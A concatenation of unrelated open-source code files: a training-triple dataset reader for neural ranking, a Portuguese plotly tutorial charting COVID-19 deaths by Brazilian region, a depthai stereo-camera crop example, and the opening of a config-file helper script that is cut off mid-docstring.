class IndependentTrainingDatasetReader(DatasetReader):
    """
    Read a tsv file containing training triple sequences

    Expected format for each input line: <query_sequence_string>\t<pos_doc_sequence_string>\t<neg_doc_sequence_string>

    The output of ``read`` is a list of ``Instance`` s with the fields:
        query_tokens: ``TextField`` and
        doc_pos_tokens: ``TextField`` and
        doc_neg_tokens: ``TextField``

    Depending on configuration, lines may also carry teacher scores
    (knowledge distillation), document titles, or QA span annotations;
    see ``_read`` for the accepted line layouts.

    Parameters
    ----------
    tokenizer : ``Tokenizer``, optional
        Tokenizer to use to split the input sequences into words or other kinds of tokens.
    token_indexers : ``Dict[str, TokenIndexer]``, optional
        Indexers used to define input (source side) token representations. Defaults to
        ``{"tokens": SingleIdTokenIndexer()}``.
    """
    def __init__(self,
                 tokenizer=None,
                 token_indexers: Dict[str, TokenIndexer] = None,
                 max_doc_length: int = -1,
                 max_query_length: int = -1,
                 min_doc_length: int = -1,
                 min_query_length: int = -1,
                 data_augment: str = "none",
                 make_multiple_of: int = -1,
                 query_augment_mask_number: int = -1,
                 train_pairwise_distillation: bool = False,
                 train_qa_spans: bool = False):
        # Sharding/multiprocessing are handled by this reader itself via
        # shard_iterable in _read.
        super().__init__(
            manual_distributed_sharding=True,
            manual_multiprocess_sharding=True
        )
        self._tokenizer = tokenizer
        self._token_indexers = token_indexers
        # -1 disables the respective min/max length constraint.
        self.max_doc_length = max_doc_length
        self.max_query_length = max_query_length
        self.min_doc_length = min_doc_length
        self.min_query_length = min_query_length
        self.data_augment = data_augment
        # Two tokenization regimes: HuggingFace fast tokenizers produce
        # tensor dicts; anything else produces AllenNLP Token lists ("emb").
        if type(tokenizer) == FastTransformerTokenizer:
            self.token_type = "huggingface"
        else:
            self.token_type = "emb"
        self.padding_value = Token(text="@@PADDING@@", text_id=0)
        self.cls_value = Token(text="@@UNKNOWN@@", text_id=1)
        # Stopword lists kept for experimentation; the filtering code that
        # uses them is currently commented out (use_stopwords=False).
        self.lucene_stopwords = set(["a", "an", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "no", "not", "of",
                                     "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with"])
        self.msmarco_top_50_stopwords = set([".", "the", ",", "of", "and", "a", "to", "in", "is", "-", "for", ")", "(", "or", "you", "that", "are", "on", "it", ":", "as", "with", "your",
                                             "'s", "from", "by", "be", "can", "an", "this", "1", "at", "have", "2", "not", "/", "was", "if", "$", "will", "i", "one", "which", "more", "has", "3", "but", "when", "what", "all"])
        self.msmarco_top_25_stopwords = set([".", "the", ",", "of", "and", "a", "to", "in", "is", "-", "for", ")",
                                             "(", "or", "you", "that", "are", "on", "it", ":", "as", "with", "your", "'s", "from"])
        self.use_stopwords = False
        self.make_multiple_of = make_multiple_of
        self.query_augment_mask_number = query_augment_mask_number
        self.max_title_length = 30
        self.min_title_length = -1
        # When True, lines are expected to carry teacher scores.
        self.read_with_scores = train_pairwise_distillation
        self.train_qa_spans = train_qa_spans
        self.add_text_to_batch = False
    @overrides
    def _read(self, file_path):
        with open(cached_path(file_path), "r", encoding="utf8") as data_file:
            for line in self.shard_iterable(data_file):
                line = line.strip("\n")
                if not line:
                    continue
                line_parts = line.split('\t')
                pos_score = None
                neg_score = None
                pos_score_passages = None
                neg_score_passages = None
                pos_title = None
                neg_title = None
                qa_spans_pos = None
                # Accepted layouts (tab-separated):
                #   plain:        query, pos_doc, neg_doc
                #   with titles:  query, pos_title, pos_doc, neg_title, neg_doc
                #   qa spans:     spans, query, pos_doc, neg_doc
                #   distillation: pos_score, neg_score, query, pos_doc, neg_doc
                #                 (optionally with per-passage scores, 7 cols)
                if not self.read_with_scores and not self.train_qa_spans:
                    if len(line_parts) == 3:
                        query_sequence, doc_pos_sequence, doc_neg_sequence = line_parts
                    elif len(line_parts) == 5:
                        query_sequence, pos_title, doc_pos_sequence, neg_title, doc_neg_sequence = line_parts
                    else:
                        raise ConfigurationError("Invalid line format: %s" % (line))
                elif self.train_qa_spans:
                    if len(line_parts) == 4:
                        qa_spans_pos, query_sequence, doc_pos_sequence, doc_neg_sequence = line_parts
                    else:
                        raise ConfigurationError("Invalid line format: %s" % (line))
                else:
                    if len(line_parts) == 5:
                        pos_score, neg_score, query_sequence, doc_pos_sequence, doc_neg_sequence = line_parts
                    elif len(line_parts) == 7:
                        pos_score, pos_score_passages, neg_score, neg_score_passages, query_sequence, doc_pos_sequence, doc_neg_sequence = line_parts
                    else:
                        raise ConfigurationError("Invalid line format: %s" % (line))
                inst = self.text_to_instance(query_sequence, doc_pos_sequence, doc_neg_sequence, pos_title, neg_title, pos_score, neg_score, qa_spans_pos, pos_score_passages, neg_score_passages)
                if inst is not None: # this should not happen (but just in case we don't break training)
                    yield inst
    @overrides
    def text_to_instance(self, query_sequence: str, doc_pos_sequence: str, doc_neg_sequence: str, pos_title, neg_title,
                         pos_score, neg_score, qa_spans_pos, pos_score_passages, neg_score_passages) -> Instance:  # type: ignore
        # pylint: disable=arguments-differ
        # Local helper; its name intentionally shadows nothing — note that
        # self.data_augment (a string option) is a different thing.
        def data_augment(aug_type, string):
            if aug_type == "shuffle_sent":
                doc_sequence = text_to_sentences(string).split("\n")
                random.shuffle(doc_sequence)
                doc_sequence = " ".join(doc_sequence)
            elif aug_type == "reverse_sent":
                doc_sequence = text_to_sentences(string).split("\n")
                doc_sequence = " ".join(doc_sequence[::-1])
            elif aug_type == "rotate":
                tokens = text_to_words(string).split()
                n = random.randint(0, len(tokens)-1)
                doc_sequence = " ".join(tokens[n:] + tokens[:n])
            elif aug_type == "none":
                doc_sequence = string
            else:
                raise Exception("wrong aug_type")
            return doc_sequence
        if self.data_augment != "none":
            if len(doc_pos_sequence) == 0 or len(doc_neg_sequence) == 0:
                return None
            doc_pos_sequence = data_augment(self.data_augment, doc_pos_sequence)
            doc_neg_sequence = data_augment(self.data_augment, doc_neg_sequence)
        # --- Query tokenization ---
        if self.token_type == "huggingface":
            query_tokenized = self._tokenizer.tokenize(query_sequence, max_length=self.max_query_length)
            # Optionally append mask tokens before the final special token
            # (query augmentation); attention mask is extended to match.
            if self.query_augment_mask_number > -1:
                query_tokenized["input_ids"] = torch.cat([torch.nn.functional.pad(query_tokenized["input_ids"][:-1],
                                                                                  (0, self.query_augment_mask_number),
                                                                                  value=self._tokenizer._tokenizer.mask_token_id), query_tokenized["input_ids"][-1].unsqueeze(0)])
                query_tokenized["attention_mask"] = torch.nn.functional.pad(query_tokenized["attention_mask"],
                                                                            (0, self.query_augment_mask_number),
                                                                            value=1)
            query_field = PatchedTransformerTextField(**query_tokenized)
        else:
            query_tokenized = self._tokenizer.tokenize(query_sequence)
            if self.max_query_length > -1:
                query_tokenized = query_tokenized[:self.max_query_length]
            if self.min_query_length > -1 and len(query_tokenized) < self.min_query_length:
                query_tokenized = query_tokenized + [self.padding_value] * (self.min_query_length - len(query_tokenized))
            # if self.make_multiple_of > -1 and len(query_tokenized) % self.make_multiple_of != 0:
            #     query_tokenized = query_tokenized + [self.padding_value] * (self.make_multiple_of - len(query_tokenized) % self.make_multiple_of)
            query_field = TextField(query_tokenized)
        # --- Positive document tokenization (same scheme as the query) ---
        if self.token_type == "huggingface":
            doc_pos_tokenized = self._tokenizer.tokenize(doc_pos_sequence, max_length=self.max_doc_length)
            doc_pos_field = PatchedTransformerTextField(**doc_pos_tokenized)
        else:
            doc_pos_tokenized = self._tokenizer.tokenize(doc_pos_sequence)
            if self.max_doc_length > -1:
                doc_pos_tokenized = doc_pos_tokenized[:self.max_doc_length]
            if self.min_doc_length > -1 and len(doc_pos_tokenized) < self.min_doc_length:
                doc_pos_tokenized = doc_pos_tokenized + [self.padding_value] * (self.min_doc_length - len(doc_pos_tokenized))
            # if self.make_multiple_of > -1 and len(doc_pos_tokenized) % self.make_multiple_of != 0:
            #     doc_pos_tokenized = doc_pos_tokenized + [self.padding_value] * (self.make_multiple_of - len(doc_pos_tokenized) % self.make_multiple_of)
            # if self.use_stopwords:
            #     doc_pos_tokenized_filtered = []
            #     for t in doc_pos_tokenized:
            #         if t.text not in self.msmarco_top_25_stopwords:
            #             doc_pos_tokenized_filtered.append(t)
            #     doc_pos_tokenized = doc_pos_tokenized_filtered
            doc_pos_field = TextField(doc_pos_tokenized)
        # --- Negative document tokenization ---
        if self.token_type == "huggingface":
            doc_neg_tokenized = self._tokenizer.tokenize(doc_neg_sequence, max_length=self.max_doc_length)
            doc_neg_field = PatchedTransformerTextField(**doc_neg_tokenized)
        else:
            doc_neg_tokenized = self._tokenizer.tokenize(doc_neg_sequence)
            if self.max_doc_length > -1:
                doc_neg_tokenized = doc_neg_tokenized[:self.max_doc_length]
            if self.min_doc_length > -1 and len(doc_neg_tokenized) < self.min_doc_length:
                doc_neg_tokenized = doc_neg_tokenized + [self.padding_value] * (self.min_doc_length - len(doc_neg_tokenized))
            # if self.make_multiple_of > -1 and len(doc_neg_tokenized) % self.make_multiple_of != 0:
            #     doc_neg_tokenized = doc_neg_tokenized + [self.padding_value] * (self.make_multiple_of - len(doc_neg_tokenized) % self.make_multiple_of)
            # if self.use_stopwords:
            #     doc_neg_tokenized_filtered = []
            #     for t in doc_neg_tokenized:
            #         if t.text not in self.msmarco_top_25_stopwords:
            #             doc_neg_tokenized_filtered.append(t)
            #     doc_neg_tokenized = doc_neg_tokenized_filtered
            doc_neg_field = TextField(doc_neg_tokenized)
        # Skip degenerate triples entirely.
        if len(query_tokenized) == 0 or len(doc_neg_tokenized) == 0 or len(doc_pos_tokenized) == 0:
            return None
        ret_instance = {
            "query_tokens": query_field,
            "doc_pos_tokens": doc_pos_field,
            "doc_neg_tokens": doc_neg_field}
        # Teacher scores for pairwise distillation (optional per-passage).
        if self.read_with_scores:
            ret_instance["pos_score"] = ArrayField(np.array(float(pos_score)))
            ret_instance["neg_score"] = ArrayField(np.array(float(neg_score)))
            if pos_score_passages != None:
                pos_score_passages = [float(f) for f in pos_score_passages.split()]
                ret_instance["pos_score_passages"] = ArrayField(np.array(pos_score_passages))
            if neg_score_passages != None:
                neg_score_passages = [float(f) for f in neg_score_passages.split()]
                ret_instance["neg_score_passages"] = ArrayField(np.array(neg_score_passages))
        if pos_title != None:
            if self.token_type == "huggingface":  # ugly fix, because tokenize() reads that var and no param
                # NOTE(review): mutating the tokenizer's _max_length here
                # leaks into later tokenize() calls — confirm intentional.
                self._tokenizer._max_length = self.max_title_length - 2
            pos_title_tokenized = self._tokenizer.tokenize(pos_title)
            neg_title_tokenized = self._tokenizer.tokenize(neg_title)
            if self.max_title_length > -1:
                pos_title_tokenized = pos_title_tokenized[:self.max_title_length]
                neg_title_tokenized = neg_title_tokenized[:self.max_title_length]
            if self.min_title_length > -1 and len(pos_title_tokenized) < self.min_title_length:
                pos_title_tokenized = pos_title_tokenized + [self.padding_value] * (self.min_title_length - len(pos_title_tokenized))
            if self.min_title_length > -1 and len(neg_title_tokenized) < self.min_title_length:
                neg_title_tokenized = neg_title_tokenized + [self.padding_value] * (self.min_title_length - len(neg_title_tokenized))
            # if self.make_multiple_of > -1 and len(seq_tokenized) % self.make_multiple_of != 0:
            #     seq_tokenized = seq_tokenized + [self.padding_value] * (self.make_multiple_of - len(seq_tokenized) % self.make_multiple_of)
            # pos_title_tokenized.insert(0,self.cls_value)
            # neg_title_tokenized.insert(0,self.cls_value)
            pos_title_field = TextField(pos_title_tokenized, self._token_indexers)
            neg_title_field = TextField(neg_title_tokenized, self._token_indexers)
            ret_instance["title_pos_tokens"] = pos_title_field
            ret_instance["title_neg_tokens"] = neg_title_field
        if self.add_text_to_batch:
            ret_instance["query_text"] = MetadataField(query_sequence)
            ret_instance["doc_pos_text"] = MetadataField(doc_pos_sequence)
            ret_instance["doc_neg_text"] = MetadataField(doc_neg_sequence)
        return Instance(ret_instance)
    @overrides
    def apply_token_indexers(self, instance: Instance) -> None:
        # HuggingFace tensor fields carry their own indexing; only the
        # "emb" TextFields need indexers attached after the fact.
        if self.token_type != "huggingface":
            instance.fields["query_tokens"]._token_indexers = self._token_indexers  # type: ignore
            instance.fields["doc_pos_tokens"]._token_indexers = self._token_indexers  # type: ignore
            instance.fields["doc_neg_tokens"]._token_indexers = self._token_indexers  # type: ignore
|
<gh_stars>0
# Gráficos interativos com o *plotly*
## Gráficos de linha
Vamos começar criando gráficos de linha.
Primeiramente utilizaremos um pacote rápido e eficiente para a construção de gráficos interativos: o **plotly.express**
Para este tipo de plot é conveniente ter apenas um valor possível para a coordenada *y* e ter uma segunda coluna determinando a cor a ser utilizada.
Vamos então refazer nosso exemplo do Covid por regiões.
import plotly.express as px
Preparando o banco de dados para o **plotly.express**:
covid_regioes_px = covid_BR.set_index('data').query('regiao != "Brasil"')[['obitosAcumulado', 'regiao']].reset_index().rename(
{'obitosAcumulado':'Total de Óbitos','regiao':'Região','data':'Data'},axis=1)
covid_regioes_px = covid_regioes_px.groupby(['Região','Data']).sum()/2
covid_regioes_px = covid_regioes_px.reset_index().set_index('Data')
fig = px.line(covid_regioes_px, y="Total de Óbitos", color="Região",
line_group="Região", hover_name="Região", title='Óbitos de COVID-19 nas regiões do Brasil')
fig.show()
Podemos fixar o mesmo valor da coordenada *x* para todas as regiões na hora de passar o *mouse*:
fig = px.line(covid_regioes_px, y="Total de Óbitos", color="Região",
line_group="Região", hover_name="Região", title='Óbitos de COVID-19 nas regiões do Brasil')
fig.update_layout(hovermode='x unified')
fig.show()
Vamos agora construir o mesmo gráfico com o pacote **plotly.graph_objects**.
Não possui a simplicidade do **plotly.express**, porém possui mais flexibilidade e é mais "customizável".
Para exemplificar a utilidade dele, vamos utilizá-lo no conjunto de dados *covid_regioes*, que possui 5 colunas distintas como valores de *y*.
Além disso, veremos que o gráfico com *x* unificado ficará naturalmente melhor no **plotly.graph_objects**.
Muitos argumentos disponíveis no **plotly.graph_objects** não estão disponíveis no **plotly.express**.
import plotly.graph_objects as go
fig = go.Figure()
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Norte'], mode='lines', name='Norte'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Nordeste'], mode='lines', name='Nordeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Centro-Oeste'], mode='lines', name='Centro-Oeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Sudeste'], mode='lines', name='Sudeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Sul'], mode='lines', name='Sul'))
fig.update_layout( title='Óbitos de COVID-19 nas regiões do Brasil',
xaxis_title='Data', yaxis_title='Total de Óbitos', legend_title_text='Região', hovermode='x unified')
Vamos agora reordenar para melhor apresentação:
fig = go.Figure()
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Sudeste'], mode='lines', name='Sudeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Nordeste'], mode='lines', name='Nordeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Norte'], mode='lines', name='Norte'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Centro-Oeste'], mode='lines', name='Centro-Oeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Sul'], mode='lines', name='Sul'))
fig.update_layout( title='Óbitos de COVID-19 nas regiões do Brasil',
xaxis_title='Data', yaxis_title='Total de Óbitos', legend_title_text='Região', hovermode='x unified')
## Gráficos de coluna
fig = px.bar(covid_Regioes.reset_index().rename({'regiao':'Região','obitosNovos':'Total de Óbitos'}, axis=1),
x='Região', y='Total de Óbitos',
title='Óbitos por COVID-19 nas Regiões do Brasil')
fig.show()
Neste caso é bem simples fazer este gráfico com **graph_objects**:
covid_coluna = covid_Regioes.reset_index().rename({'regiao':'Região','obitosNovos':'Total de Óbitos'}, axis=1)
fig = go.Figure([go.Bar(x=covid_coluna['Região'], y=covid_coluna['Total de Óbitos'])])
fig.update_layout( title='Óbitos de COVID-19 nas regiões do Brasil',
xaxis_title='Região', yaxis_title='Total de Óbitos')
fig.show()
covid_coluna = covid_Regioes.reset_index().rename({'regiao':'Região','obitosNovos':'Total de Óbitos'}, axis=1)
covid_coluna['Até 18/07/2020'] = '' #Criamos uma coluna igual para todos para servir de coordenada x
fig = px.bar(covid_coluna,
x='Até 18/07/2020', y='Total de Óbitos', color='Região',
title='Óbitos por COVID-19 nas Regiões do Brasil',
barmode='group') #Esse argumento coloca as colunas lado a lado
fig.show()
Vamos recriar o gráfico anterior com **graph_objects**, neste caso sem colocar nenhuma informação no eixo *x*.
fig = go.Figure(data=[
go.Bar(name='Norte', x=['Óbitos'], y=covid_Regioes.loc['Norte']),
go.Bar(name='Nordeste', x=['Óbitos'], y=covid_Regioes.loc['Nordeste']),
go.Bar(name='Centro-Oeste', x=['Óbitos'], y=covid_Regioes.loc['Centro-Oeste']),
go.Bar(name='Sudeste', x=['Óbitos'], y=covid_Regioes.loc['Sudeste']),
go.Bar(name='Sul', x=['Óbitos'], y=covid_Regioes.loc['Sul'])
])
fig.update_layout(barmode='group', title='Óbitos por COVID-19 nas Regiões do Brasil',
yaxis_title='Total de Óbitos', legend_title_text='Região')
fig.update_xaxes(showticklabels=False)
fig.show()
fig = px.bar(covid_coluna, x='Até 18/07/2020', y='Total de Óbitos', color='Região',
title='Óbitos por COVID-19 nas Regiões do Brasil')
#Sem o argumento barmode='group' ficamos com as colunas empilhadas
fig.show()
fig = go.Figure(data=[
go.Bar(name='Norte', x=['Óbitos'], y=covid_Regioes.loc['Norte']),
go.Bar(name='Nordeste', x=['Óbitos'], y=covid_Regioes.loc['Nordeste']),
go.Bar(name='Centro-Oeste', x=['Óbitos'], y=covid_Regioes.loc['Centro-Oeste']),
go.Bar(name='Sudeste', x=['Óbitos'], y=covid_Regioes.loc['Sudeste']),
go.Bar(name='Sul', x=['Óbitos'], y=covid_Regioes.loc['Sul'])
])
fig.update_layout(barmode='stack', title='Óbitos por COVID-19 nas Regiões do Brasil',
yaxis_title='Total de Óbitos', legend_title_text='Região')
fig.update_xaxes(showticklabels=False)
fig.show()
## Gráfico de Setores
O método *pie*, tanto na biblioteca **plotly.express** quanto na **plotly.graph_objects**, é bastante imediato e se assemelha muito ao que vimos anteriormente para o **matplotlib**.
fig = px.pie(covid_Regioes_pct, values='obitosNovos', names=covid_Regioes_pct.index,
title = 'Distribuição dos Óbitos por COVID-19 nas Regiões do Brasil até 18/07/2020')
fig.show()
fig = go.Figure(data=[go.Pie(labels=covid_Regioes_pct.index, values=covid_Regioes_pct.obitosNovos,
pull=covid_Regioes_pct.explodir)])
fig.update_layout(title='Distribuição dos Óbitos por COVID-19 nas Regiões do Brasil até 18/07/2020',
yaxis_title='Total de Óbitos', legend_title_text='Região')
fig.show()
## Gráfico de Dispersão
Na prática os gráficos de linha e de dispersão são realizados com o mesmo método no **plotly.graph_objects**. Já no **plotly.express** é análogo ao método que vimos para o **matplotlib**.
df_exemplo_px = pd.DataFrame(df_exemplo['coluna_1']).rename({'coluna_1':'Valor'}, axis=1)
df_exemplo_px['Coluna'] = 'Coluna 1'
df_exemplo_px_temp = pd.DataFrame(df_exemplo['coluna_2']).rename({'coluna_2':'Valor'}, axis=1)
df_exemplo_px_temp['Coluna'] = 'Coluna 2'
df_exemplo_px = pd.concat([df_exemplo_px, df_exemplo_px_temp])
df_exemplo_px_temp = pd.DataFrame(df_exemplo['coluna_3']).rename({'coluna_3':'Valor'}, axis=1)
df_exemplo_px_temp['Coluna'] = 'Coluna 3'
df_exemplo_px = pd.concat([df_exemplo_px, df_exemplo_px_temp])
df_exemplo_px.head()
fig = px.scatter(df_exemplo_px, x=df_exemplo_px.index, y='Valor', color='Coluna')
fig.show()
Utilizando o pacote podemos trabalhar diretamente com o *df_exemplo*:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df_exemplo.index, y=df_exemplo['coluna_1'], mode='markers', name='Coluna 1'))
fig.add_trace(go.Scatter(x=df_exemplo.index, y=df_exemplo['coluna_2'], mode='markers',name='Coluna 2'))
fig.add_trace(go.Scatter(x=df_exemplo.index, y=df_exemplo['coluna_3'], mode='markers',name='Coluna 3'))
fig.update_layout( title='Gráfico de Dispersão do df_exemplo',
xaxis_title='Data', yaxis_title='Valor', legend_title_text='Coluna')
## Histograma
Com o **plotly.express** podemos aplicar o método diretamente com poucas diferenças entre os argumentos. Vemos que no lugar de *bins*, devemos utilizar *nbins* e no lugar de *alpha*, devemos combinar *barmode='overlay'* com *opacity*.
Vamos preparar o banco de dados para o histograma.
covid_regioes_diarios = pd.DataFrame()
regioes = covid_BR.query('regiao != "Brasil"')['regiao'].drop_duplicates().array
for regiao in regioes:
temp_series = covid_BR.set_index('data').query('regiao == @regiao')['obitosNovos'].groupby('data').sum()/2
temp_series.name = 'obitos_' + regiao
covid_regioes_diarios = pd.concat([covid_regioes_diarios, temp_series], axis=1)
covid_regioes_diarios.index = pd.to_datetime(covid_regioes_diarios.index)
covid_regioes_diarios
fig = px.histogram(covid_regioes_diarios.obitos_Nordeste, nbins=30, title='''
Distribuição da quantidade de óbitos diários de COVID-19 no nordeste do Brasil
''')
fig.show()
covid_regioes_diarios_px = covid_BR.set_index(
'data').query('regiao != "Brasil"')[['obitosNovos', 'regiao']].reset_index().rename(
{'obitosNovos':'Óbitos','regiao':'Região','data':'Data'},axis=1)
covid_regioes_diarios_px = covid_regioes_diarios_px.groupby(['Região','Data']).sum()/2
covid_regioes_diarios_px = covid_regioes_diarios_px.reset_index().set_index('Data')
fig = px.histogram(covid_regioes_diarios_px, nbins=30, color='Região', opacity=0.5, barmode='overlay', title='''
Distribuição da quantidade de óbitos diários de COVID-19 nas regiões do Brasil
''')
fig.show()
Agora vejamos com **plotly.graph_objects**:
def fazer_histograma_plotly():
    """Draw overlaid, translucent per-region histograms of daily COVID-19 deaths in Brazil."""
    fig = go.Figure()
    fig.update_layout(barmode='overlay', title='''
Distribuição da quantidade de óbitos diários de COVID-19 nas regiões do Brasil
''',
                      yaxis_title="Quantidade de Dias", xaxis_title="Óbitos", legend_title_text='Região')
    # one trace per region, added in the original presentation order
    for nome_regiao in ('Norte', 'Nordeste', 'Centro-Oeste', 'Sudeste', 'Sul'):
        fig.add_trace(go.Histogram(x=covid_regioes_diarios['obitos_' + nome_regiao], name=nome_regiao))
    fig.update_traces(opacity=0.5, xbins={'size': 50})
    fig.show()
fazer_histograma_plotly()
## BoxPlot
No **plotly** os argumentos do *boxplot* são muito semelhantes aos do histograma, mudando essencialmente que o argumento dos dados no histograma é *x* e do *boxplot* é *y*.
fig = px.box(df_exemplo_px, x="Coluna", y="Valor")
fig.show()
fig = px.box(covid_regioes_diarios_px, x="Região", y="Óbitos")
fig.show()
fig = px.box(covid_regioes_diarios_px, x='Região', y='Óbitos', notched=True, color='Região',
title='Distribuição da quantidade de óbitos diários de COVID-19 nas regiões do Brasil')
fig.show()
def fazer_boxplot_plotly():
    """Draw one box plot per Brazilian region for daily COVID-19 deaths."""
    fig = go.Figure()
    fig.update_layout(barmode='overlay', title='''
Distribuição da quantidade de óbitos diários de COVID-19 nas regiões do Brasil
''',
                      yaxis_title="Óbitos", legend_title_text='Região')
    # one box per region, in the original presentation order
    for nome_regiao in ('Norte', 'Nordeste', 'Centro-Oeste', 'Sudeste', 'Sul'):
        fig.add_trace(go.Box(y=covid_regioes_diarios['obitos_' + nome_regiao], name=nome_regiao))
    fig.show()
fazer_boxplot_plotly()
#!/usr/bin/env python3
"""
This example shows usage of mono camera in crop mode with the possibility to move the crop.
Uses 'WASD' controls to move the crop window, 'T' to trigger autofocus, 'IOKL,.' for manual exposure/focus:
Control: key[dec/inc] min..max
exposure time: I O 1..33000 [us]
sensitivity iso: K L 100..1600
To go back to auto controls:
'E' - autoexposure
"""
import cv2
import depthai as dai
# Step size ('W','A','S','D' controls): fraction of the normalized (0..1)
# frame that the crop window moves per key press
stepSize = 0.02
# Manual exposure/focus set step
expStep = 500  # us
isoStep = 50
# Start defining a pipeline
pipeline = dai.Pipeline()
# Define a source - two mono (grayscale) cameras, one per board socket, both at 720p
camRight = pipeline.createMonoCamera()
camRight.setBoardSocket(dai.CameraBoardSocket.RIGHT)
camRight.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
camLeft = pipeline.createMonoCamera()
camLeft.setBoardSocket(dai.CameraBoardSocket.LEFT)
camLeft.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
# Crop range: start with the centered 20% window (0.4..0.6 on both axes)
topLeft = dai.Point2f(0.4, 0.4)
bottomRight = dai.Point2f(0.6, 0.6)
manipRight = pipeline.createImageManip()
manipRight.initialConfig.setCropRect(topLeft.x, topLeft.y, bottomRight.x, bottomRight.y)
manipLeft = pipeline.createImageManip()
manipLeft.initialConfig.setCropRect(topLeft.x, topLeft.y, bottomRight.x, bottomRight.y)
# NOTE(review): only the right manip gets an explicit max output frame size;
# presumably manipLeft should get the same call — confirm against depthai docs
manipRight.setMaxOutputFrameSize(camRight.getResolutionHeight()*camRight.getResolutionWidth()*3)
# Camera movement config (wasd): one host->device stream feeds crop updates to both manips
configIn = pipeline.createXLinkIn()
configIn.setStreamName('config')
configIn.out.link(manipRight.inputConfig)
configIn.out.link(manipLeft.inputConfig)
# Camera control (exp, iso, focus): a second host->device stream drives both cameras
controlIn = pipeline.createXLinkIn()
controlIn.setStreamName('control')
controlIn.out.link(camRight.inputControl)
controlIn.out.link(camLeft.inputControl)
# Linking with USB: camera output -> image manip input
camRight.out.link(manipRight.inputImage)
camLeft.out.link(manipLeft.inputImage)
# Create outputs: cropped frames stream back to the host as "right" / "left"
manipOutRight = pipeline.createXLinkOut()
manipOutRight.setStreamName("right")
manipRight.out.link(manipOutRight.input)
manipOutLeft = pipeline.createXLinkOut()
manipOutLeft.setStreamName("left")
manipLeft.out.link(manipOutLeft.input)
def clamp(num, v0, v1):
    """Limit *num* to at most *v1*, then raise it to at least *v0*."""
    capped = num if num < v1 else v1
    return capped if capped > v0 else v0
# Pipeline defined, now the device is connected to
with dai.Device(pipeline) as device:
# Start pipeline
device.startPipeline()
# Output queues will be used to get the grayscale frames
qRight = device.getOutputQueue(manipOutRight.getStreamName(), maxSize=4, blocking=False)
qLeft = device.getOutputQueue(manipOutLeft.getStreamName(), maxSize=4, blocking=False)
configQueue = device.getInputQueue(configIn.getStreamName())
controlQueue = device.getInputQueue(controlIn.getStreamName())
def displayFrame(name, frame):
cv2.imshow(name, frame)
sendCamConfig = False
# Defaults and limits for manual focus/exposure controls
expTime = 20000
expMin = 1
expMax = 33000
sensIso = 800
sensMin = 100
sensMax = 1600
while True:
inRight = qRight.get()
inLeft = qLeft.get()
frameRight = inRight.getCvFrame()
frameLeft = inLeft.getCvFrame()
displayFrame("right", frameRight)
displayFrame("left", frameLeft)
# Update screen
key = cv2.waitKey(1)
if key == ord('q'):
break
elif key == ord('c'):
ctrl = dai.CameraControl()
ctrl.setCaptureStill(True)
controlQueue.send(ctrl)
elif key == ord('e'):
print("Autoexposure enable")
ctrl = dai.CameraControl()
ctrl.setAutoExposureEnable()
controlQueue.send(ctrl)
elif key in [ord('i'), ord('o'), ord('k'), ord('l')]:
if key == ord('i'): expTime -= expStep
if key == ord('o'): expTime += expStep
if key == ord('k'): sensIso -= isoStep
if key == ord('l'): sensIso += isoStep
expTime = clamp(expTime, expMin, expMax)
sensIso = clamp(sensIso, sensMin, sensMax)
print("Setting manual exposure, time:", expTime, "iso:", sensIso)
ctrl = dai.CameraControl()
ctrl.setManualExposure(expTime, sensIso)
controlQueue.send(ctrl)
elif key == ord('w'):
if topLeft.y - stepSize >= 0:
topLeft.y -= stepSize
bottomRight.y -= stepSize
sendCamConfig = True
elif key == ord('a'):
if topLeft.x - stepSize >= 0:
topLeft.x -= stepSize
bottomRight.x -= stepSize
sendCamConfig = True
elif key == ord('s'):
if bottomRight.y + stepSize <= 1:
topLeft.y += stepSize
bottomRight.y += stepSize
sendCamConfig = True
elif key == ord('d'):
if bottomRight.x + stepSize <= 1:
topLeft.x += stepSize
bottomRight.x += stepSize
sendCamConfig = True
if sendCamConfig:
cfg = dai.ImageManipConfig()
cfg.setCropRect(topLeft.x, topLeft.y, bottomRight.x, bottomRight.y)
configQueue.send(cfg)
sendCamConfig = False
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017, <NAME>
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import difflib
import os
import os.path
import re
import subprocess
import sys
import yaml
# find config file either in the first argument or in the current working directory
def find_config_file(args, names):
    """Locate a config file and return (absolute path or None, remaining args).

    If args[0] is a file, use it directly; if it is a directory containing one
    of *names*, use that; otherwise search the current working directory.
    """
    def search_dir(directory):
        # return the first of *names* that exists inside *directory*
        for candidate in names:
            candidate_path = os.path.join(directory, candidate)
            if os.path.isfile(candidate_path):
                return os.path.abspath(candidate_path)
        return None

    if args:
        first = args[0]
        if os.path.isfile(first):
            return os.path.abspath(first), args[1:]
        found = search_dir(first)
        if found is not None:
            return found, args[1:]
    return search_dir(os.getcwd()), args
# parse range tuples from arguments
def parse_ranges(args, offset=0):
    """Parse user-supplied selections into (start, end) tuples.

    Accepts single indices ("3"), closed ranges ("2-5"), an open start ("-4",
    only as the first item) and an open end ("7-", which terminates parsing
